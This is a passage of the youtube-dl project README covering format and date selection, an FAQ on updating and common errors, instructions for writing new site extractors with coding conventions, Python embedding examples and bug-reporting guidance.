Since the end of April 2015 and version 2015.04.26, youtube-dl uses `-f bestvideo+bestaudio/best` as the default format selection (see [#5447](https://github.com/ytdl-org/youtube-dl/issues/5447), [#5456](https://github.com/ytdl-org/youtube-dl/issues/5456)). If ffmpeg or avconv are installed this results in downloading `bestvideo` and `bestaudio` separately and muxing them together into a single file giving the best overall quality available. Otherwise it falls back to `best` and results in downloading the best available quality served as a single file. `best` is also needed for videos that don't come from YouTube because they don't provide the audio and video in two different files. If you want to only download some DASH formats (for example if you are not interested in getting videos with a resolution higher than 1080p), you can add `-f bestvideo[height<=?1080]+bestaudio/best` to your configuration file. Note that if you use youtube-dl to stream to `stdout` (and most likely to pipe it to your media player then), i.e. you explicitly specify output template as `-o -`, youtube-dl still uses `-f best` format selection in order to start content delivery immediately to your player and not to wait until `bestvideo` and `bestaudio` are downloaded and muxed.
If you want to preserve the old format selection behavior (prior to youtube-dl 2015.04.26), i.e. you want to download the best available quality media served as a single file, you should explicitly specify your choice with `-f best`. You may want to add it to the [configuration file](#configuration) in order not to type it every time you run youtube-dl.
#### Format selection examples
Note that on Windows you may need to use double quotes instead of single.
```bash
# Download best mp4 format available or any other best if no mp4 available
$ youtube-dl -f 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best'
# Download best format available but no better than 480p
$ youtube-dl -f 'bestvideo[height<=480]+bestaudio/best[height<=480]'
# Download best video only format but no bigger than 50 MB
$ youtube-dl -f 'best[filesize<50M]'
# Download best format available via direct link over HTTP/HTTPS protocol
$ youtube-dl -f '(bestvideo+bestaudio/best)[protocol^=http]'
# Download the best video format and the best audio format without merging them
$ youtube-dl -f 'bestvideo,bestaudio' -o '%(title)s.f%(format_id)s.%(ext)s'
```
Note that in the last example, an output template is recommended as bestvideo and bestaudio may have the same file name.
# VIDEO SELECTION
Videos can be filtered by their upload date using the options `--date`, `--datebefore` or `--dateafter`. They accept dates in two formats:
- Absolute dates: Dates in the format `YYYYMMDD`.
- Relative dates: Dates in the format `(now|today)[+-][0-9](day|week|month|year)(s)?`
Examples:
```bash
# Download only the videos uploaded in the last 6 months
$ youtube-dl --dateafter now-6months
# Download only the videos uploaded on January 1, 1970
$ youtube-dl --date 19700101
$ # Download only the videos uploaded in the 200x decade
$ youtube-dl --dateafter 20000101 --datebefore 20091231
```
# FAQ
### How do I update youtube-dl?
If you've followed [our manual installation instructions](https://ytdl-org.github.io/youtube-dl/download.html), you can simply run `youtube-dl -U` (or, on Linux, `sudo youtube-dl -U`).
If you have used pip, a simple `sudo pip install -U youtube-dl` is sufficient to update.
If you have installed youtube-dl using a package manager like *apt-get* or *yum*, use the standard system update mechanism to update. Note that distribution packages are often outdated. As a rule of thumb, youtube-dl releases at least once a month, and often weekly or even daily. Simply go to https://yt-dl.org to find out the current version. Unfortunately, there is nothing we youtube-dl developers can do if your distribution serves a really outdated version. You can (and should) complain to your distribution in their bugtracker or support forum.
As a last resort, you can also uninstall the version installed by your package manager and follow our manual installation instructions. For that, remove the distribution's package, with a line like
sudo apt-get remove -y youtube-dl
Afterwards, simply follow [our manual installation instructions](https://ytdl-org.github.io/youtube-dl/download.html):
```
sudo wget https://yt-dl.org/latest/youtube-dl -O /usr/local/bin/youtube-dl
sudo chmod a+x /usr/local/bin/youtube-dl
hash -r
```
Again, from then on you'll be able to update with `sudo youtube-dl -U`.
### youtube-dl is extremely slow to start on Windows
Add a file exclusion for `youtube-dl.exe` in Windows Defender settings.
### I'm getting an error `Unable to extract OpenGraph title` on YouTube playlists
YouTube changed their playlist format in March 2014 and later on, so you'll need at least youtube-dl 2014.07.25 to download all YouTube videos.
If you have installed youtube-dl with a package manager, pip, setup.py or a tarball, please use that to update. Note that Ubuntu packages do not seem to get updated anymore. Since we are not affiliated with Ubuntu, there is little we can do. Feel free to [report bugs](https://bugs.launchpad.net/ubuntu/+source/youtube-dl/+filebug) to the [Ubuntu packaging people](mailto:ubuntu-motu@lists.ubuntu.com?subject=outdated%20version%20of%20youtube-dl) - all they have to do is update the package to a somewhat recent version. See above for a way to update.
### I'm getting an error when trying to use output template: `error: using output template conflicts with using title, video ID or auto number`
Make sure you are not using `-o` with any of these options `-t`, `--title`, `--id`, `-A` or `--auto-number` set in command line or in a configuration file. Remove the latter if any.
### Do I always have to pass `-citw`?
By default, youtube-dl intends to have the best options (incidentally, if you have a convincing case that these should be different, [please file an issue where you explain that](https://yt-dl.org/bug)). Therefore, it is unnecessary and sometimes harmful to copy long option strings from webpages. In particular, the only option out of `-citw` that is regularly useful is `-i`.
### Can you please put the `-b` option back?
Most people asking this question are not aware that youtube-dl now defaults to downloading the highest available quality as reported by YouTube, which will be 1080p or 720p in some cases, so you no longer need the `-b` option. For some specific videos, maybe YouTube does not report them to be available in a specific high quality format you're interested in. In that case, simply request it with the `-f` option and youtube-dl will try to download it.
### I get HTTP error 402 when trying to download a video. What's this?
Apparently YouTube requires you to pass a CAPTCHA test if you download too much. We're [considering to provide a way to let you solve the CAPTCHA](https://github.com/ytdl-org/youtube-dl/issues/154), but at the moment, your best course of action is pointing a web browser to the youtube URL, solving the CAPTCHA, and restart youtube-dl.
### Do I need any other programs?
youtube-dl works fine on its own on most sites. However, if you want to convert video/audio, you'll need [avconv](https://libav.org/) or [ffmpeg](https://www.ffmpeg.org/). On some sites - most notably YouTube - videos can be retrieved in a higher quality format without sound. youtube-dl will detect whether avconv/ffmpeg is present and automatically pick the best option.
Videos or video formats streamed via RTMP protocol can only be downloaded when [rtmpdump](https://rtmpdump.mplayerhq.hu/) is installed. Downloading MMS and RTSP videos requires either [mplayer](https://mplayerhq.hu/) or [mpv](https://mpv.io/) to be installed.
### I have downloaded a video but how can I play it?
Once the video is fully downloaded, use any video player, such as [mpv](https://mpv.io/), [vlc](https://www.videolan.org/) or [mplayer](https://www.mplayerhq.hu/).
### I extracted a video URL with `-g`, but it does not play on another machine / in my web browser.
It depends a lot on the service. In many cases, requests for the video (to download/play it) must come from the same IP address and with the same cookies and/or HTTP headers. Use the `--cookies` option to write the required cookies into a file, and advise your downloader to read cookies from that file. Some sites also require a common user agent to be used, use `--dump-user-agent` to see the one in use by youtube-dl. You can also get necessary cookies and HTTP headers from JSON output obtained with `--dump-json`.
It may be beneficial to use IPv6; in some cases, the restrictions are only applied to IPv4. Some services (sometimes only for a subset of videos) do not restrict the video URL by IP address, cookie, or user-agent, but these are the exception rather than the rule.
Please bear in mind that some URL protocols are **not** supported by browsers out of the box, including RTMP. If you are using `-g`, your own downloader must support these as well.
If you want to play the video on a machine that is not running youtube-dl, you can relay the video content from the machine that runs youtube-dl. You can use `-o -` to let youtube-dl stream a video to stdout, or simply allow the player to download the files written by youtube-dl in turn.
### ERROR: no fmt_url_map or conn information found in video info
YouTube has switched to a new video info format in July 2011 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl.
### ERROR: unable to download video
YouTube requires an additional signature since September 2012 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl.
### Video URL contains an ampersand and I'm getting some strange output `[1] 2839` or `'v' is not recognized as an internal or external command`
That's actually the output from your shell. Since ampersand is one of the special shell characters it's interpreted by the shell preventing you from passing the whole URL to youtube-dl. To disable your shell from interpreting the ampersands (or any other special characters) you have to either put the whole URL in quotes or escape them with a backslash (which approach will work depends on your shell).
For example if your URL is https://www.youtube.com/watch?t=4&v=BaW_jenozKc you should end up with following command:
```youtube-dl 'https://www.youtube.com/watch?t=4&v=BaW_jenozKc'```
or
```youtube-dl https://www.youtube.com/watch?t=4\&v=BaW_jenozKc```
For Windows you have to use the double quotes:
```youtube-dl "https://www.youtube.com/watch?t=4&v=BaW_jenozKc"```
### ExtractorError: Could not find JS function u'OF'
In February 2015, the new YouTube player contained a character sequence in a string that was misinterpreted by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl.
### HTTP Error 429: Too Many Requests or 402: Payment Required
These two error codes indicate that the service is blocking your IP address because of overuse. Contact the service and ask them to unblock your IP address, or - if you have acquired a whitelisted IP address already - use the [`--proxy` or `--source-address` options](#network-options) to select another IP address.
### SyntaxError: Non-ASCII character
The error
File "youtube-dl", line 2
SyntaxError: Non-ASCII character '\x93' ...
means you're using an outdated version of Python. Please update to Python 2.6 or 2.7.
### What is this binary file? Where has the code gone?
Since June 2012 ([#342](https://github.com/ytdl-org/youtube-dl/issues/342)) youtube-dl is packed as an executable zipfile, simply unzip it (might need renaming to `youtube-dl.zip` first on some systems) or clone the git repository, as laid out above. If you modify the code, you can run it by executing the `__main__.py` file. To recompile the executable, run `make youtube-dl`.
### The exe throws an error due to missing `MSVCR100.dll`
To run the exe you need to install first the [Microsoft Visual C++ 2010 Redistributable Package (x86)](https://www.microsoft.com/en-US/download/details.aspx?id=5555).
### On Windows, how should I set up ffmpeg and youtube-dl? Where should I put the exe files?
If you put youtube-dl and ffmpeg in the same directory that you're running the command from, it will work, but that's rather cumbersome.
To make a different directory work - either for ffmpeg, or for youtube-dl, or for both - simply create the directory (say, `C:\bin`, or `C:\Users\<User name>\bin`), put all the executables directly in there, and then [set your PATH environment variable](https://www.java.com/en/download/help/path.xml) to include that directory.
From then on, after restarting your shell, you will be able to access both youtube-dl and ffmpeg (and youtube-dl will be able to find ffmpeg) by simply typing `youtube-dl` or `ffmpeg`, no matter what directory you're in.
### How do I put downloads into a specific folder?
Use the `-o` to specify an [output template](#output-template), for example `-o "/home/user/videos/%(title)s-%(id)s.%(ext)s"`. If you want this for all of your downloads, put the option into your [configuration file](#configuration).
### How do I download a video starting with a `-`?
Either prepend `https://www.youtube.com/watch?v=` or separate the ID from the options with `--`:
youtube-dl -- -wNyEUrxzFU
youtube-dl "https://www.youtube.com/watch?v=-wNyEUrxzFU"
### How do I pass cookies to youtube-dl?
Use the `--cookies` option, for example `--cookies /path/to/cookies/file.txt`.
In order to extract cookies from browser use any conforming browser extension for exporting cookies. For example, [cookies.txt](https://chrome.google.com/webstore/detail/cookiestxt/njabckikapfpffapmjgojcnbfjonfjfg) (for Chrome) or [cookies.txt](https://addons.mozilla.org/en-US/firefox/addon/cookies-txt/) (for Firefox).
Note that the cookies file must be in Mozilla/Netscape format and the first line of the cookies file must be either `# HTTP Cookie File` or `# Netscape HTTP Cookie File`. Make sure you have correct [newline format](https://en.wikipedia.org/wiki/Newline) in the cookies file and convert newlines if necessary to correspond with your OS, namely `CRLF` (`\r\n`) for Windows and `LF` (`\n`) for Unix and Unix-like systems (Linux, macOS, etc.). `HTTP Error 400: Bad Request` when using `--cookies` is a good sign of invalid newline format.
Passing cookies to youtube-dl is a good way to workaround login when a particular extractor does not implement it explicitly. Another use case is working around [CAPTCHA](https://en.wikipedia.org/wiki/CAPTCHA) some websites require you to solve in particular cases in order to get access (e.g. YouTube, CloudFlare).
### How do I stream directly to media player?
You will first need to tell youtube-dl to stream media to stdout with `-o -`, and also tell your media player to read from stdin (it must be capable of this for streaming) and then pipe former to latter. For example, streaming to [vlc](https://www.videolan.org/) can be achieved with:
youtube-dl -o - "https://www.youtube.com/watch?v=BaW_jenozKcj" | vlc -
### How do I download only new videos from a playlist?
Use download-archive feature. With this feature you should initially download the complete playlist with `--download-archive /path/to/download/archive/file.txt` that will record identifiers of all the videos in a special file. Each subsequent run with the same `--download-archive` will download only new videos and skip all videos that have been downloaded before. Note that only successful downloads are recorded in the file.
For example, at first,
youtube-dl --download-archive archive.txt "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re"
will download the complete `PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re` playlist and create a file `archive.txt`. Each subsequent run will only download new videos if any:
youtube-dl --download-archive archive.txt "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re"
### Should I add `--hls-prefer-native` into my config?
When youtube-dl detects an HLS video, it can download it either with the built-in downloader or ffmpeg. Since many HLS streams are slightly invalid and ffmpeg/youtube-dl each handle some invalid cases better than the other, there is an option to switch the downloader if needed.
When youtube-dl knows that one particular downloader works better for a given website, that downloader will be picked. Otherwise, youtube-dl will pick the best downloader for general compatibility, which at the moment happens to be ffmpeg. This choice may change in future versions of youtube-dl, with improvements of the built-in downloader and/or ffmpeg.
In particular, the generic extractor (used when your website is not in the [list of supported sites by youtube-dl](https://ytdl-org.github.io/youtube-dl/supportedsites.html) cannot mandate one specific downloader.
If you put either `--hls-prefer-native` or `--hls-prefer-ffmpeg` into your configuration, a different subset of videos will fail to download correctly. Instead, it is much better to [file an issue](https://yt-dl.org/bug) or a pull request which details why the native or the ffmpeg HLS downloader is a better choice for your use case.
### Can you add support for this anime video site, or site which shows current movies for free?
As a matter of policy (as well as legality), youtube-dl does not include support for services that specialize in infringing copyright. As a rule of thumb, if you cannot easily find a video that the service is quite obviously allowed to distribute (i.e. that has been uploaded by the creator, the creator's distributor, or is published under a free license), the service is probably unfit for inclusion to youtube-dl.
A note on the service that they don't host the infringing content, but just link to those who do, is evidence that the service should **not** be included into youtube-dl. The same goes for any DMCA note when the whole front page of the service is filled with videos they are not allowed to distribute. A "fair use" note is equally unconvincing if the service shows copyright-protected videos in full without authorization.
Support requests for services that **do** purchase the rights to distribute their content are perfectly fine though. If in doubt, you can simply include a source that mentions the legitimate purchase of content.
### How can I speed up work on my issue?
(Also known as: Help, my important issue not being solved!) The youtube-dl core developer team is quite small. While we do our best to solve as many issues as possible, sometimes that can take quite a while. To speed up your issue, here's what you can do:
First of all, please do report the issue [at our issue tracker](https://yt-dl.org/bugs). That allows us to coordinate all efforts by users and developers, and serves as a unified point. Unfortunately, the youtube-dl project has grown too large to use personal email as an effective communication channel.
Please read the [bug reporting instructions](#bugs) below. A lot of bugs lack all the necessary information. If you can, offer proxy, VPN, or shell access to the youtube-dl developers. If you are able to, test the issue from multiple computers in multiple countries to exclude local censorship or misconfiguration issues.
If nobody is interested in solving your issue, you are welcome to take matters into your own hands and submit a pull request (or coerce/pay somebody else to do so).
Feel free to bump the issue from time to time by writing a small comment ("Issue is still present in youtube-dl version ...from France, but fixed from Belgium"), but please not more than once a month. Please do not declare your issue as `important` or `urgent`.
### How can I detect whether a given URL is supported by youtube-dl?
For one, have a look at the [list of supported sites](docs/supportedsites.md). Note that it can sometimes happen that the site changes its URL scheme (say, from https://example.com/video/1234567 to https://example.com/v/1234567 ) and youtube-dl reports an URL of a service in that list as unsupported. In that case, simply report a bug.
It is *not* possible to detect whether a URL is supported or not. That's because youtube-dl contains a generic extractor which matches **all** URLs. You may be tempted to disable, exclude, or remove the generic extractor, but the generic extractor not only allows users to extract videos from lots of websites that embed a video from another service, but may also be used to extract video from a service that it's hosting itself. Therefore, we neither recommend nor support disabling, excluding, or removing the generic extractor.
If you want to find out whether a given URL is supported, simply call youtube-dl with it. If you get no videos back, chances are the URL is either not referring to a video or unsupported. You can find out which by examining the output (if you run youtube-dl on the console) or catching an `UnsupportedError` exception if you run it from a Python program.
# Why do I need to go through that much red tape when filing bugs?
Before we had the issue template, despite our extensive [bug reporting instructions](#bugs), about 80% of the issue reports we got were useless, for instance because people used ancient versions hundreds of releases old, because of simple syntactic errors (not in youtube-dl but in general shell usage), because the problem was already reported multiple times before, because people did not actually read an error message, even if it said "please install ffmpeg", because people did not mention the URL they were trying to download and many more simple, easy-to-avoid problems, many of whom were totally unrelated to youtube-dl.
youtube-dl is an open-source project manned by too few volunteers, so we'd rather spend time fixing bugs where we are certain none of those simple problems apply, and where we can be reasonably confident to be able to reproduce the issue without asking the reporter repeatedly. As such, the output of `youtube-dl -v YOUR_URL_HERE` is really all that's required to file an issue. The issue template also guides you through some basic steps you can do, such as checking that your version of youtube-dl is current.
# DEVELOPER INSTRUCTIONS
Most users do not need to build youtube-dl and can [download the builds](https://ytdl-org.github.io/youtube-dl/download.html) or get them from their distribution.
To run youtube-dl as a developer, you don't need to build anything either. Simply execute
python -m youtube_dl
To run the test, simply invoke your favorite test runner, or execute a test file directly; any of the following work:
python -m unittest discover
python test/test_download.py
nosetests
See item 6 of [new extractor tutorial](#adding-support-for-a-new-site) for how to run extractor specific test cases.
If you want to create a build of youtube-dl yourself, you'll need
* python
* make (only GNU make is supported)
* pandoc
* zip
* nosetests
### Adding support for a new site
If you want to add support for a new site, first of all **make sure** this site is **not dedicated to [copyright infringement](README.md#can-you-add-support-for-this-anime-video-site-or-site-which-shows-current-movies-for-free)**. youtube-dl does **not support** such sites thus pull requests adding support for them **will be rejected**.
After you have ensured this site is distributing its content legally, you can follow this quick list (assuming your service is called `yourextractor`):
1. [Fork this repository](https://github.com/ytdl-org/youtube-dl/fork)
2. Check out the source code with:
git clone git@github.com:YOUR_GITHUB_USERNAME/youtube-dl.git
3. Start a new git branch with
cd youtube-dl
git checkout -b yourextractor
4. Start with this simple template and save it to `youtube_dl/extractor/yourextractor.py`:
```python
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class YourExtractorIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?yourextractor\.com/watch/(?P<id>[0-9]+)'
_TEST = {
'url': 'https://yourextractor.com/watch/42',
'md5': 'TODO: md5 sum of the first 10241 bytes of the video file (use --test)',
'info_dict': {
'id': '42',
'ext': 'mp4',
'title': 'Video title goes here',
'thumbnail': r're:^https?://.*\.jpg$',
# TODO more properties, either as:
# * A value
# * MD5 checksum; start the string with md5:
# * A regular expression; start the string with re:
# * Any Python type (for example int or float)
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
# TODO more code goes here, for example ...
title = self._html_search_regex(r'<h1>(.+?)</h1>', webpage, 'title')
return {
'id': video_id,
'title': title,
'description': self._og_search_description(webpage),
'uploader': self._search_regex(r'<div[^>]+id="uploader"[^>]*>([^<]+)<', webpage, 'uploader', fatal=False),
# TODO more properties (see youtube_dl/extractor/common.py)
}
```
5. Add an import in [`youtube_dl/extractor/extractors.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/extractor/extractors.py).
6. Run `python test/test_download.py TestDownload.test_YourExtractor`. This *should fail* at first, but you can continually re-run it until you're done. If you decide to add more than one test, then rename ``_TEST`` to ``_TESTS`` and make it into a list of dictionaries. The tests will then be named `TestDownload.test_YourExtractor`, `TestDownload.test_YourExtractor_1`, `TestDownload.test_YourExtractor_2`, etc. Note that tests with `only_matching` key in test's dict are not counted in.
7. Have a look at [`youtube_dl/extractor/common.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/extractor/common.py) for possible helper methods and a [detailed description of what your extractor should and may return](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L94-L303). Add tests and code for as many as you want.
8. Make sure your code follows [youtube-dl coding conventions](#youtube-dl-coding-conventions) and check the code with [flake8](http://flake8.pycqa.org/en/latest/index.html#quickstart):
$ flake8 youtube_dl/extractor/yourextractor.py
9. Make sure your code works under all [Python](https://www.python.org/) versions claimed supported by youtube-dl, namely 2.6, 2.7, and 3.2+.
10. When the tests pass, [add](https://git-scm.com/docs/git-add) the new files and [commit](https://git-scm.com/docs/git-commit) them and [push](https://git-scm.com/docs/git-push) the result, like this:
$ git add youtube_dl/extractor/extractors.py
$ git add youtube_dl/extractor/yourextractor.py
$ git commit -m '[yourextractor] Add new extractor'
$ git push origin yourextractor
11. Finally, [create a pull request](https://help.github.com/articles/creating-a-pull-request). We'll then review and merge it.
In any case, thank you very much for your contributions!
## youtube-dl coding conventions
This section introduces a guide lines for writing idiomatic, robust and future-proof extractor code.
Extractors are very fragile by nature since they depend on the layout of the source data provided by 3rd party media hosters out of your control and this layout tends to change. As an extractor implementer your task is not only to write code that will extract media links and metadata correctly but also to minimize dependency on the source's layout and even to make the code foresee potential future changes and be ready for that. This is important because it will allow the extractor not to break on minor layout changes thus keeping old youtube-dl versions working. Even though this breakage issue is easily fixed by emitting a new version of youtube-dl with a fix incorporated, all the previous versions become broken in all repositories and distros' packages that may not be so prompt in fetching the update from us. Needless to say, some non rolling release distros may never receive an update at all.
### Mandatory and optional metafields
For extraction to work youtube-dl relies on metadata your extractor extracts and provides to youtube-dl expressed by an [information dictionary](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L94-L303) or simply *info dict*. Only the following meta fields in the *info dict* are considered mandatory for a successful extraction process by youtube-dl:
- `id` (media identifier)
- `title` (media title)
- `url` (media download URL) or `formats`
In fact only the last option is technically mandatory (i.e. if you can't figure out the download location of the media the extraction does not make any sense). But by convention youtube-dl also treats `id` and `title` as mandatory. Thus the aforementioned metafields are the critical data that the extraction does not make any sense without and if any of them fail to be extracted then the extractor is considered completely broken.
[Any field](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L188-L303) apart from the aforementioned ones are considered **optional**. That means that extraction should be **tolerant** to situations when sources for these fields can potentially be unavailable (even if they are always available at the moment) and **future-proof** in order not to break the extraction of general purpose mandatory fields.
#### Example
Say you have some source dictionary `meta` that you've fetched as JSON with HTTP request and it has a key `summary`:
```python
meta = self._download_json(url, video_id)
```
Assume at this point `meta`'s layout is:
```python
{
...
"summary": "some fancy summary text",
...
}
```
Assume you want to extract `summary` and put it into the resulting info dict as `description`. Since `description` is an optional meta field you should be ready that this key may be missing from the `meta` dict, so that you should extract it like:
```python
description = meta.get('summary') # correct
```
and not like:
```python
description = meta['summary'] # incorrect
```
The latter will break extraction process with `KeyError` if `summary` disappears from `meta` at some later time but with the former approach extraction will just go ahead with `description` set to `None` which is perfectly fine (remember `None` is equivalent to the absence of data).
Similarly, you should pass `fatal=False` when extracting optional data from a webpage with `_search_regex`, `_html_search_regex` or similar methods, for instance:
```python
description = self._search_regex(
r'<span[^>]+id="title"[^>]*>([^<]+)<',
webpage, 'description', fatal=False)
```
With `fatal` set to `False` if `_search_regex` fails to extract `description` it will emit a warning and continue extraction.
You can also pass `default=<some fallback value>`, for example:
```python
description = self._search_regex(
r'<span[^>]+id="title"[^>]*>([^<]+)<',
webpage, 'description', default=None)
```
On failure this code will silently continue the extraction with `description` set to `None`. That is useful for metafields that may or may not be present.
### Provide fallbacks
When extracting metadata try to do so from multiple sources. For example if `title` is present in several places, try extracting from at least some of them. This makes it more future-proof in case some of the sources become unavailable.
#### Example
Say `meta` from the previous example has a `title` and you are about to extract it. Since `title` is a mandatory meta field you should end up with something like:
```python
title = meta['title']
```
If `title` disappears from `meta` in future due to some changes on the hoster's side the extraction would fail since `title` is mandatory. That's expected.
Assume that you have some another source you can extract `title` from, for example `og:title` HTML meta of a `webpage`. In this case you can provide a fallback scenario:
```python
title = meta.get('title') or self._og_search_title(webpage)
```
This code will try to extract from `meta` first and if it fails it will try extracting `og:title` from a `webpage`.
### Regular expressions
#### Don't capture groups you don't use
Capturing group must be an indication that it's used somewhere in the code. Any group that is not used must be non capturing.
##### Example
Don't capture id attribute name here since you can't use it for anything anyway.
Correct:
```python
r'(?:id|ID)=(?P<id>\d+)'
```
Incorrect:
```python
r'(id|ID)=(?P<id>\d+)'
```
#### Make regular expressions relaxed and flexible
When using regular expressions try to write them fuzzy, relaxed and flexible, skipping insignificant parts that are more likely to change, allowing both single and double quotes for quoted values and so on.
##### Example
Say you need to extract `title` from the following HTML code:
```html
<span style="position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;" class="title">some fancy title</span>
```
The code for that task should look similar to:
```python
title = self._search_regex(
r'<span[^>]+class="title"[^>]*>([^<]+)', webpage, 'title')
```
Or even better:
```python
title = self._search_regex(
r'<span[^>]+class=(["\'])title\1[^>]*>(?P<title>[^<]+)',
webpage, 'title', group='title')
```
Note how you tolerate potential changes in the `style` attribute's value or switch from using double quotes to single for `class` attribute:
The code definitely should not look like:
```python
title = self._search_regex(
r'<span style="position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;" class="title">(.*?)</span>',
webpage, 'title', group='title')
```
### Long lines policy
There is a soft limit to keep lines of code under 80 characters long. This means it should be respected if possible and if it does not make readability and code maintenance worse.
For example, you should **never** split long string literals like URLs or some other often copied entities over multiple lines to fit this limit:
Correct:
```python
'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4'
```
Incorrect:
```python
'https://www.youtube.com/watch?v=FqZTN594JQw&list='
'PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4'
```
### Use convenience conversion and parsing functions
Wrap all extracted numeric data into safe functions from [`youtube_dl/utils.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/utils.py): `int_or_none`, `float_or_none`. Use them for string to number conversions as well.
Use `url_or_none` for safe URL processing.
Use `try_get` for safe metadata extraction from parsed JSON.
Use `unified_strdate` for uniform `upload_date` or any `YYYYMMDD` meta field extraction, `unified_timestamp` for uniform `timestamp` extraction, `parse_filesize` for `filesize` extraction, `parse_count` for count meta fields extraction, `parse_resolution`, `parse_duration` for `duration` extraction, `parse_age_limit` for `age_limit` extraction.
Explore [`youtube_dl/utils.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/utils.py) for more useful convenience functions.
#### More examples
##### Safely extract optional description from parsed JSON
```python
description = try_get(response, lambda x: x['result']['video'][0]['summary'], compat_str)
```
##### Safely extract more optional metadata
```python
video = try_get(response, lambda x: x['result']['video'][0], dict) or {}
description = video.get('summary')
duration = float_or_none(video.get('durationMs'), scale=1000)
view_count = int_or_none(video.get('views'))
```
# EMBEDDING YOUTUBE-DL
youtube-dl makes the best effort to be a good command-line program, and thus should be callable from any programming language. If you encounter any problems parsing its output, feel free to [create a report](https://github.com/ytdl-org/youtube-dl/issues/new).
From a Python program, you can embed youtube-dl in a more powerful fashion, like this:
```python
from __future__ import unicode_literals
import youtube_dl
ydl_opts = {}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc'])
```
Most likely, you'll want to use various options. For a list of options available, have a look at [`youtube_dl/YoutubeDL.py`](https://github.com/ytdl-org/youtube-dl/blob/3e4cedf9e8cd3157df2457df7274d0c842421945/youtube_dl/YoutubeDL.py#L137-L312). For a start, if you want to intercept youtube-dl's output, set a `logger` object.
Here's a more complete example of a program that outputs only errors (and a short message after the download is finished), and downloads/converts the video to an mp3 file:
```python
from __future__ import unicode_literals
import youtube_dl
class MyLogger(object):
def debug(self, msg):
pass
def warning(self, msg):
pass
def error(self, msg):
print(msg)
def my_hook(d):
if d['status'] == 'finished':
print('Done downloading, now converting ...')
ydl_opts = {
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192',
}],
'logger': MyLogger(),
'progress_hooks': [my_hook],
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc'])
```
# BUGS
Bugs and suggestions should be reported at: <https://github.com/ytdl-org/youtube-dl/issues>. Unless you were prompted to or there is another pertinent reason (e.g. GitHub fails to accept the bug report), please do not send bug reports via personal email. For discussions, join us in the IRC channel [#youtube-dl](irc://chat.freenode.net/#youtube-dl) on freenode ([webchat](https://webchat.freenode.net/?randomnick=1&channels=youtube-dl)).
**Please include the full output of youtube-dl when run with `-v`**, i.e. **add** `-v` flag to **your command line**, copy the **whole** output and post it in the issue body wrapped in \`\`\` for better formatting. It should look similar to this:
```
$ youtube-dl -v <your command line>
[debug] System config: []
[debug] User config: []
[debug] Command-line args: [u'-v', u'https://www.youtube.com/watch?v=BaW_jenozKcj']
[debug] Encodings: locale cp1251, fs mbcs, out cp866, pref cp1251
[debug] youtube-dl version 2015.12.06
[debug] Git HEAD: 135392e
[debug] Python version 2.6.6 - Windows-2003Server-5.2.3790-SP2
[debug] exe versions: ffmpeg N-75573-g1d0487f, ffprobe N-75573-g1d0487f, rtmpdump 2.4
[debug] Proxy map: {}
...
```
**Do not post screenshots of verbose logs; only plain text is acceptable.**
The output (including the first lines) contains important debugging information. Issues without the full output are often not reproducible and therefore do not get solved in short order, if ever.
Please re-read your issue once again to avoid a couple of common mistakes (you can and should use this as a checklist):
### Is the description of the issue itself sufficient?
We often get issue reports that we cannot really decipher. While in most cases we eventually get the required information after asking back multiple times, this poses an unnecessary drain on our resources. Many contributors, including myself, are also not native speakers, so we may misread some parts.
So please elaborate on what feature you are requesting, or what bug you want to be fixed. Make sure that it's obvious
- What the problem is
- How it could be fixed
- How your proposed solution would look like
If your report is shorter than two lines, it is almost certainly missing some of these, which makes it hard for us to respond to it. We're often too polite to close the issue outright, but the missing info makes misinterpretation likely. As a committer myself, I often get frustrated by these issues, since the only possible way for me to move forward on them is to ask for clarification over and over.
For bug reports, this means that your report should contain the *complete* output of youtube-dl when called with the `-v` flag. The error message you get for (most) bugs even says so, but you would not believe how many of our bug reports do not contain this information.
If your server has multiple IPs or you suspect censorship, adding `--call-home` may be a good idea to get more diagnostics. If the error is `ERROR: Unable to extract ...` and you cannot reproduce it from multiple countries, add `--dump-pages` (warning: this will yield a rather large output, redirect it to the file `log.txt` by adding `>log.txt 2>&1` to your command-line) or upload the `.dump` files you get when you add `--write-pages` [somewhere](https://gist.github.com/).
**Site support requests must contain an example URL**. An example URL is a URL you might want to download, like `https://www.youtube.com/watch?v=BaW_jenozKc`. There should be an obvious video present. Except under very special circumstances, the main page of a video service (e.g. `https://www.youtube.com/`) is *not* an example URL.
### Are you using the latest version?
Before reporting any issue, type `youtube-dl -U`. This should report that you're up-to-date. About 20% of the reports we receive are already fixed, but people are using outdated versions. This goes for feature requests as well.
### Is the issue already documented?
